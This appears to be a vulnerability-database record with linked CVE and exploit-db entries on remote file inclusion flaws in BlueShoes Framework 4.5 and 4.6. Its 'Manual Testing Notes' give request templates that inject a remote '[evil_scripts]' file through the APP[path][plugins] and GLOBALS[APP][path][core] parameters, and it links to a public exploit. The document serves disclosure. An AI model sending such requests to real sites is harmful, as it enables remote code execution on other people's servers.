{"id": "OSVDB:26002", "bulletinFamily": "software", "title": "BlueShoes Framework websearchengine/Bs_Wse_Profile.class.php APP[path][plugins] Variable Remote File Inclusion", "description": "## Vulnerability Description\nBlueShoes Framework contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to websearchengine/Bs_Wse_Profile.class.php not properly sanitizing user input supplied to the 'APP[path][plugins]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002). Additionally, the framework must be installed under the web root directory.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nBlueShoes Framework contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to websearchengine/Bs_Wse_Profile.class.php not properly sanitizing user input supplied to the 'APP[path][plugins]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[BlueShoes_path]/applications/websearchengine/Bs_Wse_Profile.class.php?APP[path][plugins]=[evil_scripts]\n## References:\nVendor URL: http://www.blueshoes.org/\n[Secunia Advisory ID:20438](https://secuniaresearch.flexerasoftware.com/advisories/20438/)\n[Related OSVDB ID: 25999](https://vulners.com/osvdb/OSVDB:25999)\n[Related OSVDB ID: 26000](https://vulners.com/osvdb/OSVDB:26000)\n[Related OSVDB ID: 25998](https://vulners.com/osvdb/OSVDB:25998)\n[Related OSVDB ID: 25996](https://vulners.com/osvdb/OSVDB:25996)\n[Related OSVDB ID: 26001](https://vulners.com/osvdb/OSVDB:26001)\n[Related OSVDB ID: 25997](https://vulners.com/osvdb/OSVDB:25997)\nISS X-Force ID: 26908\nGeneric Exploit URL: http://milw0rm.com/exploits/1870\nFrSIRT Advisory: ADV-2006-2128\n[CVE-2006-2864](https://vulners.com/cve/CVE-2006-2864)\nBugtraq ID: 18261\n", "published": "2006-06-03T08:35:31", "modified": "2006-06-03T08:35:31", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/osvdb/OSVDB:26002", "reporter": "Kacper(kacper1964@yahoo.pl)", "references": [], "cvelist": ["CVE-2006-2864"], "type": "osvdb", "lastseen": "2017-04-28T13:20:22", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "cfe9c26c7c18e1791fc116c26a009a64"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "c7f9ee4fe7e265334c36bcb06aecea29"}, {"key": "cvss", "hash": "88e04999358e76acae57a21bcf224d40"}, {"key": "description", "hash": "19b22617e37a03790f3d8d22aaf8feff"}, {"key": "href", "hash": "7b35e995f106addfd7df62ee8b0fed10"}, {"key": "modified", "hash": "bb4eda7850d6f8ecbc2d340f58b95ca3"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "bb4eda7850d6f8ecbc2d340f58b95ca3"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "37f47c5035a3a7799ce4f3bc60e83b75"}, {"key": "title", "hash": "4b3b649a6a5f58b358b43ceb71d1fa32"}, {"key": "type", "hash": "1327ac71f7914948578f08c54f772b10"}], "hash": "0b71380406c8fa4e8ab50cced6b66bcb38e13bbeb923e2a0b39fbb9d7777a77a", "viewCount": 0, "objectVersion": "1.2", "affectedSoftware": [{"name": "BlueShoes Framework", "operator": "eq", "version": "4.6"}, {"name": "BlueShoes Framework", "operator": "eq", "version": "4.5"}], "enchantments": {"vulnersScore": 9.0}}

{"result": {"cve": [{"id": "CVE-2006-2864", "type": "cve", "title": "CVE-2006-2864", "description": "Multiple PHP remote file inclusion vulnerabilities in BlueShoes Framework 4.6 allow remote attackers to execute arbitrary PHP code via a URL in the (1) APP[path][applications] parameter to (a) Bs_Faq.class.php, (2) APP[path][core] parameter to (b) fileBrowserInner.php, (c) file.php, and (d) viewer.php, and (e) Bs_ImageArchive.class.php, (3) GLOBALS[APP][path][core] parameter to (f) Bs_Ml_User.class.php, or (4) APP[path][plugins] parameter to (g) Bs_Wse_Profile.class.php.", "published": "2006-06-06T16:06:00", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2864", "cvelist": ["CVE-2006-2864"], "lastseen": "2017-10-19T11:12:24"}], "osvdb": [{"id": "OSVDB:26001", "type": "osvdb", "title": "BlueShoes Framework mailinglist/Bs_Ml_User.class.php GLOBALS[APP][path][core] Variable Remote File Inclusion", "description": "## Vulnerability Description\nBlueShoes Framework contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to mailinglist/Bs_Ml_User.class.php not properly sanitizing user input supplied to the 'GLOBALS[APP][path][core]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002). Additionally, the framework must be installed under the web root directory.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nBlueShoes Framework contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to mailinglist/Bs_Ml_User.class.php not properly sanitizing user input supplied to the 'GLOBALS[APP][path][core]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[BlueShoes_path]/applications/mailinglist/Bs_Ml_User.class.php?GLOBALS[APP][path][core]=[evil_scripts]\n## References:\nVendor URL: http://www.blueshoes.org/\n[Secunia Advisory ID:20438](https://secuniaresearch.flexerasoftware.com/advisories/20438/)\n[Related OSVDB ID: 25999](https://vulners.com/osvdb/OSVDB:25999)\n[Related OSVDB ID: 26000](https://vulners.com/osvdb/OSVDB:26000)\n[Related OSVDB ID: 25998](https://vulners.com/osvdb/OSVDB:25998)\n[Related OSVDB ID: 25996](https://vulners.com/osvdb/OSVDB:25996)\n[Related OSVDB ID: 25997](https://vulners.com/osvdb/OSVDB:25997)\n[Related OSVDB ID: 26002](https://vulners.com/osvdb/OSVDB:26002)\nISS X-Force ID: 26908\nGeneric Exploit URL: http://milw0rm.com/exploits/1870\nFrSIRT Advisory: ADV-2006-2128\n[CVE-2006-2864](https://vulners.com/cve/CVE-2006-2864)\nBugtraq ID: 18261\n", "published": "2006-06-03T08:35:31", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/osvdb/OSVDB:26001", "cvelist": ["CVE-2006-2864"], "lastseen": "2017-04-28T13:20:22"}], "exploitdb": [{"id": "EDB-ID:1870", "type": "exploitdb", "title": "BlueShoes Framework <= 4.6 - Remote File Include Vulnerabilities", "description": "BlueShoes Framework <= 4.6 Remote File Include Vulnerabilities. CVE-2006-2864. Webapps exploit for php platform", "published": "2006-06-03T00:00:00", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/1870/", "cvelist": ["CVE-2006-2864"], "lastseen": "2016-01-31T15:02:54"}]}}